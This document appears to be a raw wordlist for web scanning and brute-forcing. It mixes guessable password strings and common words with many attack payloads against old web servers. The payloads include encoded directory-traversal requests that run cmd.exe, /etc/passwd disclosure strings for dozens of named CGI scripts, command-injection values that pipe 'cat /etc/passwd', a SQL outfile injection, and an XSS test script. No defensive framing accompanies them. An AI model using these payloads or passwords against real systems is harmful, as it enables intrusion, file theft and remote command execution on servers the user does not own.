!
!@
!@#$%^
!@#$%^&
!@#$%^&*
!admin!
!qaz@wsx
!qaz2wsx
!qazxsw@
!qazxsw2
$$$$
$$$$$$
%00
%23data%23
%23db1
%23ewebeditor
%23newasp
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/motd
%63%67%69%2d%62%69%6e/%74%65%73%74%2d%63%67%69
&&&&&&
(88888888)
*
*&^%4321
***
******
********
*********
*.jhtml
*.jsp::$data
*.shtml
*woaini1
,./,.
.
...
....
......
........
../../../..
../admin
../admin/default
../admin/fuckyou
../admin/index
../admin/login
../admin/manage
../web-inf
././cg%69-bin/./test%20cgi
./admin
./cgi-bin/test%20cgi
./web-inf
.htpasswdwebbin/passwd/p1/htpasswddb
.jpilot
.jpilot/^/.jpilot
:8080
:8080/manager
:8099
:81
:8765/example
:8898
:8899
;lk
;lk;lk
;lkasd
?m=a
?pageservices
?s=d
?wp-html-rend
@#$%^&
@@@@@@
@@@@@@@@
@@asd
@123qwe@
@1q2w3e@
@20000214
@q1w2e3r4@
@system*
[admin_login]
][poiuytrewq
^&*()
^&*()yuiop
^^^^^^
_+|{}:"<>?
_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
_mem_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
_mem_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
_vti_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
_vti_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
_vti_bin/shtml.dll/_vti_rpc
_vti_cnf/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
_vti_cnf/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
~
~!@
~!@qazwsx
~adm
~admin
~administrator
~bin
~cgi
~cgi-bin
~cgi-bin/aglimpse
~cgi-bin/authorizenet.cgi
~cgi-bin/phf*
~cgi-win
~dat
~data
~database
~dev
~etc
~ftp
~guest
~home
~htaccess
~html
~htpasswd
~ibill
~lancelot
~log
~logs
~logs/.memberfile
~logs/memberfile
~lp
~mnt
~named
~nobody
~nobody/etc
~ofs
~oracle
~passwd
~passwrd
~pre
~rollo/members
~rollo/members/.htpasswd_privat
~root
~sbin
~stats
~sys~
~temp
~test
~tmp
~usr
~uucp
~var
+
+.
++
++.
+++++++++++++++++++++<td>
<script>alert('can+cross+site+attack')</script>
======
=1-203948576
0.123445789/*
0.123456789/*
000??
0000??
001??
002??
007??
008??
0668-2196688
0731-4131765
1@1
1@3$
1@3$5^
1@3$5^7*
1=2-30495867
100??
101??
108??
1088??
10th??
11@@33$$
1100??
1111??
1188??
123,.
1234,.
12345^&*(
12345^&*()
1234567??
12345678??
1314520??
133??
136??
137??
138??
138-1940294
1388??
139??
158??
1588??
163??
166??
168??
1688??
169??
188??
1888??
192??
1949??
1959??
1960??
1961??
1962??
1963??
1964??
1965??
1966??
1967??
1969??
1970??
1971??
1972??
1973??
1974??
1975??
1976??
1977??
1978??
1979??
198??
1980??
1981??
1982??
1983??
1984??
1985??
1986??
1987??
1988??
1989??
1990??
1997??
1999??
1q@w3e
1q@w3e$r
1qa@ws
1st??
200??
2000??
2001??
2002??
2088??
20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
2100??
215.320,./88
2188??
222??
2222??
233??
234??
2345??
23456??
258??
2588??
266??
288??
2nd??
2wsx1qaz!
300??
3000??
301??
333??
3333??
345??
34567??
350??
366??
3721??
388??
3888??
3rd??
400??
433??
450??
456??
4567??
45678??
458??
466??
4728??
49+7770
4th??
500??
5201314??
54321??
555??
5555??
558??
5678??
56789??
583054337*
583054337***
588??
5888??
598??
5th??
600??
654321??
666??
6666??
668??
6688??
678??
6789??
688??
6888??
6th??
737??
771208!!
777??
7788??
789&*(
7890-=
7th??
7ujm,ki8
7ujm8ik,
800/../..
800/c:
8000/./web-inf
8010/....
8010/c:
8010/d:
8080/../examples/web-inf/../../../../..
8100/web-inf
819103-a
888??
8888??
88888??
888888??
88888888??
8899??
8th??
986688!@
987(*&
987654321??
987654321`
988??
9988??
999??
9999??
9th??
a%5fm
a&m
a&p
'a;sldkfjgh
a6266005*
about:blank
access-log
actcms.mdb/data_act
a-d
ad%23yl029house
ad-01
ad-02
adm%40in
adm@in
admin!!
admin%40casd
admin%5f
admin%5fshopxp
admin,.
admin/dsn/dsnmanager.asp?dsnaction=changeroot&rootname=d:/webspace/opendnsserver/target/target.com/db/../../../..
admin/ewebeditor2.8
admin/import/imp_rootdir.asp?result=1&www=c:/&ftp=c:/&owwwpath=c:/&oftppath=c:
admin/kindeditor/php/file_manager_json.asp?path=
admin/users.asp
admin/wo%5fedit
admin/wo%5fedit/editor
admin/wo%5fedit/editor/filemanager
admin@htxg
admin_main-1
admin=anything
admin-ls
admin-serv/config/admpw
adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
adsamples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
af../winnt/system32/cmd.exe?/c+dir
ahr0cdovl2f1dg8umtyzlmnvbs8=
ain't
air-conditioning
alai8890%23%23
allinurl:image
ana-bin/sitehtpass
ana-bin/sitehtpass/admin/db/htpasswd
anna-diana
anna-diane
anna-maria
anne-corinne
anne-marie
ann-marie
anybody'd
arealist-1
aren't
a's
a's;dlfkgjh
asdfghjkl;'
asdfjkl;
ask-qq-img
asp-bin
asp-bin/_database
asp-bin/htmledit
asp-bin/manage
asqw!@
at&t
a-z
azsxdcfvgbhnjm,.
baba,.
baixin-file
barbara-anne
bbs/cgi-bin
bbs/images/123.files/fontstyle
bbs-admin
bbs-adminm
bbscgi-bin
bbs-data
bbs-hz0752-net
bette-ann
bgfdl;hnr
biay-che
bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
bin/db2www/library/document.d2w/show
bin/empower?db=ukrteamhole
bin/htsearch?config=aaa
bin/igate/search.cgi
bin/nph-publish
bin/nph-test-cgi
bin/pals-cgi
bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/bin/ls%00
bin/post-query
bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir
bin/test-cgi
bin/view-source
bin/w3-msql
bin/www-sql
bin-sdb
bitchin'
bnmbnm,.
boilerplate.asp?nfuse_template=../../winnt/system32/axperf.ini&nfuse_currentfolder=
bor-wen
bourne-again
browser/default/connectors/jsp/connector?command=getfoldersandfiles&type=&currentfolder=%2f
b's
btc-43477557
bugzilla/long_list.cgi?buglist=1%20into%20outfile%20%27/tmp/pussycat%27
bugzilla/long_list.cgibuglist=1%20into%20outfile%20%27/tmp/pussycat%27
by-product
c/cmd.exe/c+dir
c/cmd.exe?/c+dir
c/inetpub/scripts/root.exe?/c+dir
c/root.exe/c+dir
c/root.exe?/c+dir
c/winnt/system32/cmd.exe?/c+dir
c:
c++
cable-docsis
cache-stats
calendar-cn
calendar-de
calendar-en
calendar-zh
can't
carol-jean
caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
cate-all
ccbil/cgibin/ibp/search.cgi
ccbill/secure/ccbill.log%20
ccc.exe/c+dir
ccc.exe?/c+dir
ce-admins
cgi/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
cgi/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
cgi/db2www/library/document.d2w/show
cgi/empower?db=ukrteamhole
cgi/htsearch?config=aaa
cgi/nph-publish
cgi/nph-test-cgi
cgi/pals-cgi
cgi/pollit/poll_it_ssi_v2.0.cgi?data_dir=/bin/ls%00
cgi/post-query
cgi/test-cgi
cgi/view-source
cgi/w3-msql
cgi/www-sql
cgi_bin.phpadmin/login
cgi_bin/guanli-cn
cgi_bin/law.com/admin_article/admin_login
cgi-bin
cgi-bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
cgi-bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
cgi-bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
cgi-bin/../../../../../../winnt/system32/cmd.exe?/c+dir+c:
cgi-bin/adcycle
cgi-bin/admin/admin
cgi-bin/adp
cgi-bin/aglimpse
cgi-bin/alibaba.pl/dir
cgi-bin/allmanage/adp
cgi-bin/allmanage/k
cgi-bin/am
cgi-bin/am/codes
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../etc/passwd
cgi-bin/anyform
cgi-bin/anyform2
cgi-bin/archie
cgi-bin/ash
cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
cgi-bin/auth.cgi
cgi-bin/authorize/dbmfiles/users
cgi-bin/authorizenet.cgi
cgi-bin/bash
cgi-bin/bb-hostsvc.sh?hostsvc=/../../../../../../../../etc/passwd
cgi-bin/bbs
cgi-bin/bnbform
cgi-bin/board/db
cgi-bin/bof.cgihttp/1.0/r/nuser-agent:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/r/n/r/n
cgi-bin/boozt/admin
cgi-bin/buy.storefront/3baecb4a00025ad227a4c30e95010642/winnt/cmd.exe?/c+dir
cgi-bin/c32web.exe/checkerror?error=53
cgi-bin/c32web.exe/showadmindir
cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
cgi-bin/calendar
cgi-bin/campas
cgi-bin/carbodll
cgi-bin/cart32.exe/error
cgi-bin/ccbill
cgi-bin/ccc.exe/c+dir
cgi-bin/ccc.exe?/c+dir
cgi-bin/ceilidh.exe/ceilidh/?n4
cgi-bin/ceilidh.exe/ceilidh/n4
cgi-bin/cgi-bin
cgi-bin/cgiforum.pl?thesection=../../../../../../etc/passwd%00
cgi-bin/cgiwrap
cgi-bin/cgiwrap/%3cs%3e
cgi-bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
cgi-bin/classifieds
cgi-bin/cmd.exe/c+dir
cgi-bin/cmd.exe?/c+dir
cgi-bin/cmd32.exe/c+dir
cgi-bin/cmd32.exe?/c+dir
cgi-bin/counterfiglet
cgi-bin/counterfiglet/nc/f
cgi-bin/csh
cgi-bin/cwb-bin
cgi-bin/cwb-data/data
cgi-bin/data
cgi-bin/database
cgi-bin/date
cgi-bin/day5notifier
cgi-bin/db2www/library/document.d2w/show
cgi-bin/dcforum/dcboard.cgi?az=list&file=/etc/passwd%00
cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/passwd%00
cgi-bin/directorypro.cgi?want=showcat&show=../../../..etc/passwd%00
cgi-bin/dmr
cgi-bin/dnewsweb
cgi-bin/ecommerce
cgi-bin/empower?db=ukrteamhole
cgi-bin/empowerdb=ukrteamhole
cgi-bin/epoch
cgi-bin/epochp
cgi-bin/excite
cgi-bin/ezshopper2/loadpage.cgi?id+
cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=
cgi-bin/faxsurvey
cgi-bin/filemail
cgi-bin/finger
cgi-bin/flexform
cgi-bin/formmail
cgi-bin/fortune
cgi-bin/fratboys
cgi-bin/get32.exe/dir
cgi-bin/glimpse
cgi-bin/guestbook
cgi-bin/gw5
cgi-bin/handler
cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
cgi-bin/htgrep
cgibin/htgrep/file=index.html&hdr=/etc/passwd
cgi-bin/htgrep/file=index.html&hdr=/etc/passwd
cgi-bin/htmlscript
cgi-bin/htmlscript?../../../../etc/passwd
cgi-bin/htsearch
cgi-bin/htsearch?-c/etc/passwd
cgi-bin/htsearch?config=aaa
cgi-bin/htsearchconfig=aaa
cgi-bin/ib
cgi-bin/ib/data
cgi-bin/ibill
cgibin/ibp/search.cgi
cgi-bin/info2www
cgi-bin/jj
cgi-bin/k
cgi-bin/ksh
cgi-bin/lascns
cgi-bin/lavsan
cgi-bin/log
cgi-bin/logs
cgi-bin/machineinfo
cgi-bin/mail
cgi-bin/mastergate
cgi-bin/mastergate/search.cgi
cgi-bin/megvie
cgi-bin/messaging
cgi-bin/mtc/search.cgi
cgi-bin/ncommerce3/execmacro/macro.d2w/noexistinghtmlblock
cgi-bin/netauth.cgi?cmd=show&page=../..
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
cgi-bin/netbilling
cgi-bin/netstat
cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd
cgi-bin/nph-publish
cgi-bin/nph-test-cgi
cgi-bin/pals-cgi
cgi-bin/pals-cgi?palsaction=restart&documentname=/etc/passwd
cgi-bin/pass
cgi-bin/passwd
cgi-bin/password
cgi-bin/perl
cgi-bin/pfdisplay
cgi-bin/phf
cgi-bin/phf*
cgi-bin/php
cgi-bin/phpscan
cgi-bin/pi?page=document/show_file&id=aaaaaaaaaa
cgi-bin/plusmail
cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/bin/ls%00
cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd%00
cgi-bin/post-query
cgi-bin/printenv
cgi-bin/query
cgi-bin/redirect
cgi-bin/responder
cgi-bin/rksh
cgi-bin/root.exe/c+dir
cgi-bin/root.exe?/c+dir
cgi-bin/rpm_query
cgi-bin/rsh
cgi-bin/rwcgi60
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
cgibin/search.cgi
cgi-bin/search.pl?form=/etc/passwd%00
cgi-bin/search/hsx.cgi?show=../../../../../../../etc/passwd%00
cgi-bin/sh
cgi-bin/shop.cgi/page=../../../../../../etc/passwd
cgi-bin/shopper.cgi?newpage=../../../../../../etc/passwd
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%cartid%&file=;cat%20/etc/passwd|
cgi-bin/sojourn
cgi-bin/sojourn.cgi?cat=../../../../../../etc/passwd%00
cgi-bin/ssi
cgi-bin/ssi../../../../../../../../../etc/passwd
cgi-bin/ssi/../../../../../../../../../etc/passwd
cgi-bin/ssi/htpasswd
cgi-bin/staff/inches
cgi-bin/survey
cgi-bin/talkback.cgi?article=.../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/tcsh
cgi-bin/test.cgihttp/1.1/r/nhost:virtualhost/r/n/r/n
cgi-bin/testcgi
cgi-bin/test-cgi
cgi-bin/test-cgi*
cgi-bin/test-cgi/*
cgi-bin/test-cgi?*
cgi-bin/test-env
cgi-bin/tpgnrock
cgi-bin/tst.bat/dir
cgi-bin/ttawebtop.cgi/?action=start&pg=
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
cgi-bin/ttawebtop.cgi/action=start&pg=
cgi-bin/udirectory.pl?main_field=blah&command=add_new_listing&category_file=/../../../../../../../bin/id
cgi-bin/uptime
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/passwd
cgi-bin/view-source
cgi-bin/w3-msql
cgi-bin/w3-sql
cgi-bin/w3tvarspm
cgi-bin/web
cgi-bin/web_store/web_store.cgi?page=../../../../../../../etc/passwd%00ext
cgi-bin/webc.cgi/g
cgi-bin/webcash
cgi-bin/webdriver
cgi-bin/webgais
cgi-bin/webplus
cgi-bin/webplus?script=/../../../../etc/passwd
cgi-bin/websendmail
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
cgi-bin/windmail.exe?%20|%20dir%20c:
cgi-bin/wrap
cgi-bin/wwwjoin
cgi-bin/www-sql
cgi-bin/yabb.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00
cgi-bin/z9v8..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/z9v8..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/zsh
cgi-bin2/ampro
cgi-bin2/ampro/info
cgi-bin-sdb
cgi-home
cgi-local
cgi-sdb
cgi-sys
cgi-win
cgi-win/ccbill
cgi-win/dmr
cgi-win/epoch
cgi-win/epochp
cgi-win/mastergate
cgi-win/netbilling
cgi-win/webcash
cgi-win/wwwjoin
chiefun2009*
china@))&
china2008@))*
cidu-net
cmd.exe/c+dir
cmd.exe/c+dir%20c:
cmd.exe?/c+dir
cmd.exe?/c+dir%20c:
cmd1.exe/c+dir
cmd1.exe?/c+dir
cnk:inzj
companymessagesent_submit-conct
company-profile
content/base/build/explorer/none.php?/etc
couldn't
cq-idc
c's
cscie-ci
cs-ee
css/background.cssrel=stylesheettype=text/css
css/words.cssrel=stylesheettype=text/css
d/root.exe/c+dir
d/root.exe?/c+dir
da%2fta
daili-1
daili-2
d'arcy
data%23
data%23base%23
data%23v390
data/data%23
data23%23mdb
data3%23%23
data-base
database%21
database/#$%
dead-head
dec-32
del-leibie
dhan-na
dial-in
dial-up
diane-marie
dibopai-files
dir-login
dl-1
dl-2
dl-3
dl-3-ok
dl-4
dl-5
dl-6
dmj-ask
dmjhui-ok
dmj-xp
dmr/add-passwd.cgi
dnion-sh
domain-suggestions
download.jsp?filename=/../../../../../../../../etc/passwd
dpk-ask
dpk-xp
drop-shadow
dvbbs8.2.0_ac
dvbbs8.2.0_ac/admin
dzpj-files
edit/kindeditor/php/file_manager_json.asp?path=
editor/db/ewebeditor.mdb/tmp
editor/filemanager/browser/default/browser.htmltype=image&connector=connectors/jsp/connector
editor/filemanager/browser/default/connectors/php/connector.php?command=getfoldersandfiles&type=image&currentfolder=
editor/filemanager/connectors/aspx/connector.asp?command=getfoldersandfiles&type=image&currentfolder=
ee-cs
e-mail
en-us
etc/passwd|mail
ewebeditor2.8
ewebeditor4.60
example.jsp..
examples/web-inf
examplesweb-inf
exchange/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
exchange/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
exchange/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
exchange/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
exchange/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
exchange/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
exchange/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
eye-catcher
eyidc-server
fb-admin
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/jsp/connector
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=fileupload&type=image&currentfolder=
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=getfoldersandfiles&type=image&currentfolder=
fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=getfoldersandfiles&type=&currentfolder=%2f
fd_upload/upload.asp?uppath=/fd_upimg
feilong@520
fige@919
file:/e
first-rate
flash-show
flink-add
ftb/imagegallery.aspx?rif=/&cif=../&ftb=reproduct_content2
fuck-off
fuck-you
fu-hua
f-user
fxh@7802
getlost!
getpsw-2
getpsw-3
gg-shangchuan
global.asp%3f+.htr
global.aspx%3f+.htr
global.jsp%3f+.htr
global.php%3f+.htr
goaway!
go-cart
guan%5fli
guanli-cn
guestbook-ok
gxhouse-sql
hasn't
haven't
he'd
helen-elizabeth
he'll
he'sdead
he'sdeadjim
heung-do
he-xlb
hfy8-12
ho-chi
hocus-pocus
holly-anne
homepage.nsf/$defaultnav
hong-sup
ho-shyan
h's
http:/www.sqsdgg.com
huiyuan-1
